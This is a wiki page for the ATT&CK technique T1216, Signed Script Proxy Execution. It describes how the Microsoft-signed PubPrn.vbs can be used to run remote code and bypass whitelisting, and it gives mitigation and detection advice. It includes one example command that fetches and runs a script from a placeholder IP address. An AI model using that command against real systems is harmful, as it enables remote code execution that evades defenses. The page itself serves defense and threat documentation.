Signed Script Proxy Execution

From enterprise
Jump to: navigation, search
Signed Script Proxy Execution
Technique
ID T1216
Tactic Defense Evasion, Execution
Platform Windows
Permissions Required User
Data Sources Process monitoring, Process command-line parameters
Supports Remote No
Defense Bypassed Application whitelisting, Digital Certificate Validation
Contributors Praetorian

Scripts signed with trusted certificates can be used to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application whitelisting solutions that do not account for use of these scripts.

PubPrn.vbs is signed by Microsoft and can be used to proxy execution from a remote site.1 Example command: cscript C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png

There are several other signed scripts that may be used in a similar manner.2

Examples

  • APT32 has used PubPrn.vbs within execution scripts to execute malware, possibly bypassing defenses.3

Mitigation

Certain signed scripts that can be used to execute other programs may not be necessary within a given environment. Use application whitelisting configured to block execution of these scripts if they are not required for a given system or network to prevent potential misuse by adversaries.

Detection

Monitor script processes, such as cscript, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.